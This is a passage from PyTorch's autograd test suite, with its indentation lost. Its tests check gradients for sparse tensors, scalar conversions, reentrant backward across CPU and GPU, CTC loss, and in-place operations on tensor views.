for empty_i, empty_v, empty_nnz in product([True, False], repeat=3):
sparse_size = [] if empty_i else [2, 1]
dense_size = [1, 0, 2] if empty_v else [1, 2]
nnz = 0 if empty_nnz else 5
_test(sparse_size + dense_size, len(sparse_size), nnz, device)
@dtypes(torch.double, torch.cdouble)
def test_sparse_backward(self, device, dtype):
class FixedGradientFunction(Function):
@staticmethod
def forward(ctx, x, grad_x):
ctx.save_for_backward(grad_x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_grad_x, = ctx.saved_tensors
return saved_grad_x, None
size = torch.Size([6, 3, 2])
i1 = torch.tensor([
[0, 3, 4],
[0, 2, 2],
], dtype=torch.long)
v1 = make_tensor([3, 2], dtype=dtype, device=device)
sparse_grad1 = torch.sparse_coo_tensor(i1, v1, size, dtype=dtype, device=device)
i2 = torch.tensor([
[0, 1, 3, 4],
[0, 1, 2, 2],
], dtype=torch.long)
v2 = make_tensor([4, 2], dtype=dtype, device=device)
sparse_grad2 = torch.sparse_coo_tensor(i2, v2, size, dtype=dtype, device=device)
dense_grad = torch.rand(size, device=device, dtype=dtype)
fn = FixedGradientFunction
# sparse first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, dense_grad) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# dense first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, dense_grad) + fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# sparse only
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, sparse_grad1 + sparse_grad2)
# autograd tests via common_method_invocations don't allow input tensors to
# be sparse (RuntimeError: gradcheck expects all tensor inputs are dense when
# check_sparse_nnz is set to False.)
def test_sparse_mask_autograd(self, device):
tensor = torch.randn(3, requires_grad=True, device=device)
mask = torch.ones(3, device=device)
mask[1] = 0
mask = mask.to_sparse()
converted = tensor.sparse_mask(mask).to_dense()
converted.sum().backward()
self.assertEqual(tensor.grad, mask.to_dense())
def test_pyscalar_conversions(self, device):
def _test_pyscalar_conversions(t, integral_conv):
# integral -> integral
l = t(torch.zeros(1, 1, 1, dtype=torch.long))
pyscalar = -12345
l[0] = pyscalar
self.assertEqual(integral_conv(l), pyscalar)
# floating point -> floating point
f = Variable(t(torch.randn(1, 1, dtype=torch.double)))
pyscalar = -12345.1
f[0] = pyscalar
self.assertEqual(float(f), pyscalar)
f[0] = nan
self.assertTrue(math.isnan(float(f)))
f[0] = inf
self.assertEqual(float(f), inf)
f[0] = -inf
self.assertEqual(float(f), -inf)
# integral -> floating point
# check we can convert something that loses precision
pyscalar = 1234567890123456789
self.assertNotEqual(pyscalar, integral_conv(float(pyscalar)))
l[0] = pyscalar
self.assertEqual(float(l), float(pyscalar))
# floating point -> integral
f[0] = nan
self.assertRaises(ValueError, lambda: integral_conv(f[0]))
f[0] = inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = -inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = sys.float_info.max
self.assertEqual(integral_conv(f), sys.float_info.max)
# bool, nonzero
def test_nonzero(tensor, value, expected):
tensor[0] = value
self.assertEqual(expected, bool(tensor))
self.assertEqual(expected, True if tensor else False)
test_nonzero(l, 0, False)
test_nonzero(l, -2, True)
test_nonzero(f, 0.0, False)
test_nonzero(f, sys.float_info.min, True)
test_nonzero(f, nan, bool(nan))
test_nonzero(f, inf, bool(inf))
test_nonzero(f, -inf, bool(-inf))
_test_pyscalar_conversions(lambda x: x.to(device), lambda x: int(x))
@dtypesIfCUDA(torch.half, torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
@dtypes(torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
def test_set_requires_grad_only_for_floats(self, device, dtype):
def f1():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad_()
def f2():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = True
def f3():
torch.ones(1, dtype=dtype, device=device, requires_grad=True)
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = False # should always work
a.requires_grad_(False)
for f in [f1, f2, f3]:
if dtype.is_floating_point:
f()
else:
with self.assertRaisesRegex(RuntimeError, 'floating point', msg="dt: {} device: {}".format(a.dtype, a.device)):
f()
@onlyCUDA
def test_advanced_indexing_backwards_large(self, device):
# See https://github.com/pytorch/pytorch/issues/22843
n = (1 << 16)
x = torch.rand(n, 1, device=device, requires_grad=True)
a = x[:, [0]]
a.sum().backward()
self.assertEqual(x.grad, torch.ones(n, 1, device=device))
def test_advanced_indexing_backwards_memory_format(self, device):
# See https://github.com/pytorch/pytorch/issues/36956
shape = (2, 8, 1, 2)
i = torch.randint(1, shape, device=device).contiguous(memory_format=torch.channels_last)
x = torch.randn(shape, requires_grad=True, device=device)
x[i].sum().backward()
def _test_reentrant_parent_error_on_cpu(self, device):
t1 = torch.rand([3, 3], requires_grad=True)
t2 = torch.rand([3, 3], device=device, requires_grad=True)
t3 = torch.rand([3, 3], device=device, requires_grad=True)
# Parent graph cpu graph.
t4 = t1 * t1
t5 = TestAutograd.SimulateBackwardError.apply(t4)
# Child gpu graph (much longer than parent graph).
prev = t2 * t2
for i in range(10):
prev = prev * t2
reentrant_root = prev
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will take much longer.
reentrant_root.backward()
return grad
# Parent gpu graph.
t6 = ReentrantFunc.apply(t3)
t7 = t6 * t6
# Parent graph will error out first, while child graph will continue executing.
with self.assertRaisesRegex(Exception, "Simulate error"):
torch.autograd.backward([t5.sum(), t7.sum()])
# No grads should be accumulated since child graph will stop execution
# after parent receives error.
self.assertIsNone(t2.grad)
self.assertIsNone(t1.grad)
self.assertIsNone(t3.grad)
@onlyCUDA
def test_reentrant_parent_error_on_cpu(self, device):
before = CudaMemoryLeakCheck.get_cuda_memory_usage()
# Run as separate function so that gc can clean up everything when we
# check for memory usage.
self._test_reentrant_parent_error_on_cpu(device)
# Wait for autograd thread to cleanup failed tasks.
after = CudaMemoryLeakCheck.get_cuda_memory_usage()
start = time.time()
while before != after and time.time() - start < 30:
time.sleep(0.1)
after = CudaMemoryLeakCheck.get_cuda_memory_usage()
self.assertEqual(before, after)
# test for backward in https://github.com/pytorch/pytorch/issues/15511
# TODO: opinfo pdist
def test_pdist_large(self, device):
def func(x):
return torch.pdist(x, p=2)
# shape[0] should be able to be (roughly) arbitrarily large, but the kernel
# is currently limited to smaller sizes (see issue above); this is just testing
# a floor.
shape = (1000, 1)
x = torch.randn(shape, device=device).requires_grad_()
output = torch.pdist(x, p=2)
# just run a single backward, as gradcheck/gradgradcheck is expensive here
output.sum().backward()
# TODO: see if these tests can be ported to OpInfos or moved to where's test suite
def test_where_functional(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
cond = mask_not_all_zeros((5, 5)).to(device=device)
def where(cond, x, y):
return torch.where(cond, x, y)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, device=device)])
x = torch.randn(5, 1, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, 1, dtype=torch.double, device=device, requires_grad=True)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, 5, device=device)])
def test_where_scalar(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
scalar = 4.
cond = mask_not_all_zeros((5, 5)).to(device=device)
def where_scalar_first(cond, x):
return torch.where(cond, scalar, x)
def where_scalar_second(cond, x):
return torch.where(cond, x, scalar)
gradcheck(where_scalar_first, (cond, x))
gradgradcheck(where_scalar_first, (cond, x))
gradcheck(where_scalar_second, (cond, x))
gradgradcheck(where_scalar_second, (cond, x))
@skipCUDAIf(True, """Test is flaky on Linux and Windows, typical error message:
https://github.com/pytorch/pytorch/issues/34870""")
def test_ctc_loss(self, device):
batch_size = 64
num_labels = 101
target_length = 15
gradcheck_input_size = 10
ZERO_NONE = 0
ZERO_SOME = 1
ZERO_ALL = 2
# input_length, vary_lengths, zero_lengths
tests = [(150, False, ZERO_NONE),
(150, True, ZERO_NONE),
(50, True, ZERO_SOME),
(50, True, ZERO_ALL)]
if 'cuda' in device:
tests += [(50, False, ZERO_NONE),
(50, True, ZERO_NONE),
(150, True, ZERO_SOME),
(150, True, ZERO_ALL)]
for input_length, vary_lengths, zero_mode in tests:
targets = torch.randint(1, num_labels, (batch_size, target_length),
device=device, dtype=torch.long)
x = torch.randn(gradcheck_input_size, dtype=torch.double, device=device, requires_grad=True)
tile_factors = torch.randn(input_length * batch_size * num_labels // gradcheck_input_size + 1,
device=device)
input_lengths = [(torch.randint(input_length // 2, input_length + 1, ()).item()
if vary_lengths or i == 0 else input_length) for i in range(batch_size)]
if zero_mode == ZERO_ALL:
target_lengths = [0 for _ in range(batch_size)]
else:
target_lengths = [(torch.randint(target_length // 2, target_length + 1, ()).item()
if vary_lengths else target_length) for _ in range(batch_size)]
if zero_mode == ZERO_SOME:
idxes = torch.randint(0, batch_size, (10,))
for i in idxes:
target_lengths[i] = 0
def ctc_after_softmax(x):
x_full = ((x[:, None] * tile_factors[None, :]).view(-1)[:input_length * batch_size * num_labels]
.view(input_length, batch_size, num_labels))
log_probs = torch.log_softmax(x_full, 2)
return torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths)
gradcheck(ctc_after_softmax, [x])
@onlyCUDA
@skipCUDAIfRocm
@skipCUDAIfCudnnVersionLessThan(7600)
def test_ctc_loss_cudnn(self, device):
batch_size = 16
input_length = 30
num_labels = 101
target_length = 15
targets = torch.randint(1, num_labels, (batch_size * target_length,),
device='cuda', dtype=torch.long)
log_probs = torch.log_softmax(torch.randn(input_length, batch_size, num_labels, device='cuda', dtype=torch.float), 2)
log_probs.requires_grad_()
input_lengths = batch_size * [input_length]
target_lengths = batch_size * [target_length]
grad_out = torch.randn(batch_size, device='cuda', dtype=torch.float)
with torch.backends.cudnn.flags(enabled=False):
loss_native = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths, reduction='none')
grad_native, = torch.autograd.grad(loss_native, log_probs, grad_out)
loss_cudnn = torch.nn.functional.ctc_loss(log_probs, targets.to('cpu', torch.int32),
input_lengths, target_lengths, reduction='none')
self.assertTrue("Cudnn" in str(loss_cudnn.grad_fn))
grad_cudnn, = torch.autograd.grad(loss_cudnn, log_probs, grad_out)
self.assertEqual(grad_cudnn, grad_native, atol=1e-4, rtol=0)
def test_leaky_relu_inplace_with_neg_slope(self, device):
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.leaky_relu_(a.clone(), -2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.rrelu_(a.clone(), -5.0, 1.0)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
def test_leaky_relu_inplace_with_zero_slope(self, device):
a = torch.tensor([-2., 0., 2.], device=device, requires_grad=True)
b = torch.nn.functional.leaky_relu_(a.clone(), 0.0)
b.backward(torch.ones(3, device=device))
expected = torch.tensor([0., 0., 1.], device=device)
self.assertEqual(a.grad, expected)
@onlyOnCPUAndCUDA
def test_elu_inplace_with_neg_alpha(self, device):
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.elu_(a.clone(), alpha=-2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.celu_(a.clone(), alpha=-2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
@onlyCUDA
def test_free_unneeded_tensor(self, device):
x = torch.randn(2, 3, 10, 10, device=device, requires_grad=True)
m = torch.randn(1, 3, 1, 1, device=device)
z = x.sum()
base_mem = torch.cuda.memory_allocated()
z = ((x + 2) * m).sum()
end_mem = torch.cuda.memory_allocated()
# In the end the memory usage should remain equal, because neither of
# (x + 2) and ((x + 2) * m) should be kept alive for backward, while the
# previous allocation of z had the same size as the current one.
self.assertEqual(base_mem, end_mem)
@onlyCUDA
def test_pin_memory(self, device):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
self.assertEqual(x, x.pin_memory())
self.assertIsNot(x, x.pin_memory())
self.assertTrue(x.pin_memory().requires_grad)
gradcheck(lambda x: x.pin_memory(), [x])
gradgradcheck(lambda x: x.pin_memory(), [x])
@skipCUDAIfRocm
@onlyCUDA
def test_profiler_emit_nvtx(self, device):
# This test is not intended to ensure correctness of nvtx ranges.
# That would require something a great deal more complex (you'd have to create a
# profile in a subprocess, open it, and parse the sql somehow).
# This test is merely intended to catch if emit_nvtx breaks on construction.
a = torch.tensor([1, 2, 3], dtype=torch.float32, device=device)
with torch.cuda.profiler.profile():
with emit_nvtx():
a.add(1.0)
@onlyCUDA
def test_rnn_backward_to_input_but_not_parameters(self, device):
# this checks whether it is possible to not require
# weight parameters, but require inputs, see #7722
l = torch.nn.LSTM(2, 3).to(device)
for p in l.parameters():
p.requires_grad = False
s = torch.randn(1, 1, 2, requires_grad=True, device=device)
out, _ = l(s)
out.sum().backward()
self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
@onlyCUDA
def test_lstmcell_backward_only_one_output_grad(self, device):
# checks that undefined gradients doen't hamper the backward
# see #11872
l = torch.nn.LSTMCell(2, 3).to(device).double()
s = torch.randn(1, 2, device=device, dtype=torch.double, requires_grad=True)
for i in range(2):
out = l(s)[i]
out.sum().backward()
self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
def _test_rnn_mod(self, mod, inp):
def flatten_out(mod, inp):
out = mod(inp)
return tuple([t if isinstance(t, torch.Tensor) else tt for t in out for tt in t])
gradcheckfunc = partial(flatten_out, mod)
with torch.backends.cudnn.flags(enabled=False):
gradcheck(gradcheckfunc, inp, check_batched_grad=False)
gradgradcheck(gradcheckfunc, inp, check_batched_grad=False)
if inp.is_cuda and not TEST_WITH_ROCM:
# Assert that we have good error message around unsupported CuDNN double backward
# NB: we trigger double backward using .backward() instead of autograd.grad due to
# https://github.com/pytorch/pytorch/issues/37874
with torch.backends.cudnn.flags(enabled=True):
result = gradcheckfunc(inp)
result[0].sum().backward(create_graph=True)
grad0 = next(mod.parameters()).grad
with self.assertRaisesRegex(RuntimeError,
"please disable the CuDNN backend temporarily"):
grad0.sum().backward()
# Here we avoid the backward(create_graph=True) memory leak
# described in https://github.com/pytorch/pytorch/issues/7343
for param in mod.parameters():
param.grad = None
inp.grad = None
@skipMeta # LSTM cell reuses output which was resized
def test_LSTM_grad_and_gradgrad(self, device):
hsize = 4
inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
for bias in [True, False]:
mod = torch.nn.LSTM(hsize, hsize, bias=bias).to(device).to(torch.float64)
self._test_rnn_mod(mod, inp)
@skipMeta # GRU cell reuses output which was resized
def test_GRU_grad_and_gradgrad(self, device):
hsize = 4
inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
for bias in [True, False]:
mod = torch.nn.GRU(hsize, hsize, bias=bias).to(device).to(torch.float64)
self._test_rnn_mod(mod, inp)
def test_copysign_subgradient(self, device):
# Input is 0.0
x = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Input is -0.0
x = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Other is 0.0
x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [-1.0, 0.0, 1.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Other is -0.0
x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [1.0, 0.0, -1.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
@deviceCountAtLeast(1)
def test_grad_assignment(self, devices):
x = torch.randn(5, 5, device=devices[0])
# Tests that the wrong shape raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(2, 2, device=devices[0])
# Tests that the wrong dtype raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, dtype=torch.long, device=devices[0])
# Tests that self-assignment raises
with self.assertRaises(RuntimeError):
x.grad = x
# Tests device -> cpu grad assignment raises
if self.device_type != 'cpu':
with self.assertRaises(RuntimeError):
t_cpu = torch.rand(5, 5)
t_cpu.grad = torch.randn(5, 5, device=devices[0])
# Tests half type on CUDA
if self.device_type == 'cuda':
x = x.to(dtype=torch.half, device=devices[0])
x.grad = torch.zeros_like(x)
# Tests cross-device assignment raises
if len(devices) > 1:
x = torch.randn(5, 5, device=devices[0])
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, device=devices[1])
@deviceCountAtLeast(1)
@dtypes(torch.float, torch.double)
def test_requires_grad_factory(self, devices, dtype):
fns = [torch.ones_like, torch.randn_like]
x = torch.randn(2, 3, dtype=dtype, device=devices[0])
for fn in fns:
for requires_grad in [True, False]:
output = fn(x, dtype=dtype, device=devices[0], requires_grad=requires_grad)
self.assertEqual(requires_grad, output.requires_grad)
self.assertIs(dtype, output.dtype)
self.assertEqual(devices[0], str(x.device))
@deviceCountAtLeast(2)
def test_unused_output_device(self, devices):
from torch.nn.parallel._functions import Broadcast
x = torch.randn(5, 5, dtype=torch.float, device=devices[0], requires_grad=True)
outputs = Broadcast.apply(list(range(len(devices))), x)
y = outputs[-1] * 2
y.sum().backward()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(x.grad, torch.ones(5, 5) * 2)
@deviceCountAtLeast(2)
def test_backward_device(self, devices):
# check that current device matches the variable's device
device = [None]
class Identity(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.clone()
@staticmethod
def backward(ctx, grad_output):
device[0] = grad_output.device
return grad_output.clone()
v = torch.randn(1, device=devices[1], requires_grad=True)
Identity.apply(v).backward()
self.assertEqual(str(device[0]), devices[1])
@deviceCountAtLeast(2)
def test_inputbuffer_add_multidevice(self, devices):
input = torch.randn(1, device=devices[0], requires_grad=True)
output = input.to(device=devices[1]) + input.to(device=devices[1])
output.backward()
@onlyCPU
def test_copy_(self, device):
# At the time of writing this test, copy_ is not generated from native_functions.yaml
# there was a bug that bfloat16 was not recognized as floating.
x = torch.randn(10, device=device, requires_grad=True)
floating_dt = [dt for dt in torch.testing.get_all_dtypes() if dt.is_floating_point]
for dt in floating_dt:
y = torch.empty(10, device=device, dtype=dt)
y.copy_(x)
self.assertTrue(y.requires_grad)
z = x.to(torch.bfloat16)
self.assertTrue(z.requires_grad)
@onlyCUDA
def test_simple_reentrant_cross_device(self, device):
class ReentrantFunc(Function):
_cpu_mode = True
@staticmethod
def forward(ctx, x):
return x * (x + 2)
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
if ReentrantFunc._cpu_mode:
new_param = torch.randn(2, 2, requires_grad=True)
(new_param ** 2).sum().backward()
else:
new_param = torch.randn(2, 2, device=device, requires_grad=True)
(new_param ** 2).sum().backward()
return grad_output
# Reentrant starts on GPU thread, finishs on GPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
out = ReentrantFunc.apply(x)
out.sum().backward()
# Reentrant starts on CPU thread, finishs on GPU thread
x = torch.randn(2, 2, requires_grad=True)
# set ReentrantFunc node to GPU to emit tasks to GPU queue
ReentrantFunc._cpu_mode = False
out = ReentrantFunc.apply(x)
out.sum().backward()
# Reentrant starts on GPU thread, finishs on CPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
# set ReentrantFunc node to CPU to emit tasks to CPU queue
ReentrantFunc._cpu_mode = True
out = ReentrantFunc.apply(x)
out.sum().backward()
@onlyCUDA
def test_cross_device_reentrant_autograd(self, device):
# Output on gpu so that this task will be associated with the gpu thread
def fn_on_gpu(inp):
# Artificially increase the priority of the next op to make sure it runs
# as soon as we reach it before the ops of branch1.
dummy = inp * 2 * 2 * 2 * 2
return inp.to(device=device)
def parent_on_cpu(inp):
# Slow branch of ops on gpu so that the work queue for the gpu thread
# won't empty too quickly. They also have smaller priorities than the
# ones created by fn_on_gpu
branch1 = inp.to(device=device)
branch1 = branch1 / branch1
branch1 = branch1 / branch1
branch1 = branch1 / branch1
# Perform checkpoint on cpu tensors. So the last op performed in the reentrant
# autograd is an AccumulateGrad that runs on the cpu thread for the gpu thread.
# So the cpu thread will notify the gpu thread with an empty NodeTask.
branch2 = checkpoint(fn_on_gpu, inp)
out = branch2 + branch1
return out
inp = torch.rand(2, requires_grad=True)
out = parent_on_cpu(inp)
# This will segfault if the empty NodeTask is not handled properly in the
# gpu thread ReadyQueue
out.sum().backward()
def test_inplace_on_view_backprop_base(self, device):
# modify view and back-prop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v1.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [1, 1]])
def test_inplace_on_view_backprop_view_of_view(self, device):
# modify view and backprop through view-of-view
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = x.narrow(0, 0, 1)
v1.mul_(2)
v2.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [0, 0]])
def test_inplace_on_view_of_view(self, device):
# modify view-of-view and backprop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1]])
def test_inplace_on_view_then_no_grad(self, device):
# Perform an in-place operation on a view of a non-leaf variable.
a = torch.ones(3, 1, dtype=torch.double, device=device, requires_grad=True)
b = a * 2
c = b.view_as(b)
c[0][0] = 3
# Force a graph update with grad disabled.
with torch.no_grad():
c.grad_fn
c.sum().backward()
def test_inplace_on_view_gradcheck(self, device):
# gradcheck modifications to views
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
x.narrow(1, 2, 2).narrow(0, 1, 2).mul_(b)
x.narrow(1, 0, 2).narrow(0, 1, 2).mul_(b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_multiple_outputs(self, device):
root = torch.arange(9., dtype=torch.double).reshape(3, 3).requires_grad_()
x = root.clone()
v1 = x.unbind()
with self.assertRaises(RuntimeError):
v1[0].mul_(2)
def test_inplace_on_view_of_multiple_output_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.unbind(0)
c = b[0].view_as(b[0])
with self.assertRaises(RuntimeError):
c.mul_(2)
def test_inplace_multiple_output_view_of_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.view_as(a)
c = b.unbind(0)
with self.assertRaises(RuntimeError):
c[0].mul_(2)
def test_inplace_on_view_makes_base_require_grad(self, device):
# in-place modification to view makes base require grad
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=False)
b = torch.randn(4, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
self.assertFalse(x.requires_grad)
x.narrow(1, 2, 2).mul_(b)
self.assertTrue(x.requires_grad)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_backprop_view(self, device):
# modify view and backprop through view
a = torch.tensor([2., 5.], device=device, requires_grad=False)
b = torch.tensor([3.], device=device, requires_grad=True)
res = a.narrow(0, 1, 1).mul_(b)
res.sum().backward()
self.assertEqual(b.grad.tolist(), [5])
self.assertIsNone(a.grad)
def test_inplace_on_view_modify_base(self, device):
# Test that an in-place operation on a base that forced it to require
# grad also forces any previous views to require grad and backprop
# correctly
r = torch.ones(1, dtype=torch.double, device=device, requires_grad=True)
def fn(r):
x = torch.ones(5, dtype=torch.double, device=device)
v = x.select(0, 1)
self.assertFalse(v.requires_grad)
self.assertIsNone(v.grad_fn)
x.add_(r) # v is now dependent on r due to the in-place op on x
self.assertTrue(v.requires_grad)
return v
gradcheck(fn, [r])
gradgradcheck(fn, [r])
def test_inplace_on_view_python(self, device):
# in-place modifications of Python-autograd created view
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
class PyAdd(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y):
ctx.mark_dirty(x)
x.add_(y)
return x
@staticmethod
def backward(ctx, grad):
return grad, grad
def func(root, b):
x = root.clone()
PyAdd.apply(x.narrow(1, 2, 2).narrow(0, 1, 2), b)
PyAdd.apply(x.narrow(1, 0, 2).narrow(0, 1, 2), b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_non_contig(self, device):
root = torch.ones(2, 3, 2, device=device).select(2, 1).t().requires_grad_(True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1], [1, 1]])
def test_inplace_on_view_multi_output_unsafe(self, device):
for f in [lambda t: t.unsafe_split(1),
lambda t: t.unsafe_split_with_sizes((1, 1, 1)),
lambda t: t.unsafe_chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
s1.mul_(s2)
s1.sum().backward()
def test_inplace_on_view_multi_output_safe(self, device):
for f in [lambda t: t.split(1),
lambda t: t.split_with_sizes((1, 1, 1)),
lambda t: t.chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
error_msg = 'This view is the output of a function that returns multiple views.'
with self.assertRaisesRegex(RuntimeError, error_msg):
s1.mul_(s2)
def test_mv_grad_stride_0(self, device):
# Reference: https://github.com/pytorch/pytorch/issues/38315
mat = torch.randn(2, 2, dtype=torch.double, device=device)
vec = torch.randn(1, dtype=torch.double, device=device).requires_grad_(True)
def fn(vec):
# Expand inside the function to make sure the input to
# gradcheck does not have overlapping memory
vec = vec.expand(2)
return (mat @ vec).sum()
gradcheck(fn, (vec))
gradgradcheck(fn, (vec))
@onlyCUDA
def test_gradcheck_input_output_different_device(self, device):
x = torch.ones((1,), dtype=torch.double, device="cuda", requires_grad=True)
gradcheck(lambda x: x.to("cpu"), (x,))
x = torch.ones((1,), dtype=torch.double, device="cpu", requires_grad=True)
gradcheck(lambda x: x.to("cuda"), (x,))
# TODO: see if this can be OpInfo'd or moved to test_reductions.py
def test_logcumsumexp_large_value(self, device):
a = torch.rand(4, 4, 4, dtype=torch.double, requires_grad=True)
with torch.no_grad():
# Large Number
a[0] = 10000
gradcheck(lambda x: x.logcumsumexp(0), a)
gradgradcheck(lambda x: x.logcumsumexp(0), a)
gradcheck(lambda x: x.logcumsumexp(1), a)
gradgradcheck(lambda x: x.logcumsumexp(1), a)
gradcheck(lambda x: x.logcumsumexp(2), a)
gradgradcheck(lambda x: x.logcumsumexp(2), a)
def test_strided_leaf_grad_layout(self, device):
# (1) If leaf is non-overlapping and dense, grad's layout should match its leaf.
for fmt_a in (torch.contiguous_format, torch.channels_last):
for fmt_b in (torch.contiguous_format, torch.channels_last):
a = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_a)
b = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_b)
a.requires_grad_()
b.requires_grad_()
# checks (1) for broadcasted gradients
a.sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
b.sum().backward()
self.assertEqual(b.grad.stride(), b.stride())
# checks (1) for non-broadcasted gradients
a.grad = None
b.grad = None
(a * b).sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
self.assertEqual(b.grad.stride(), b.stride())
# (2) If leaf isn't dense, checks that grads are rowmajor contiguous.
c = torch.empty_strided((2, 2), (4, 2), device=device).copy_(torch.rand((2, 2), device=device))
c.requires_grad_()
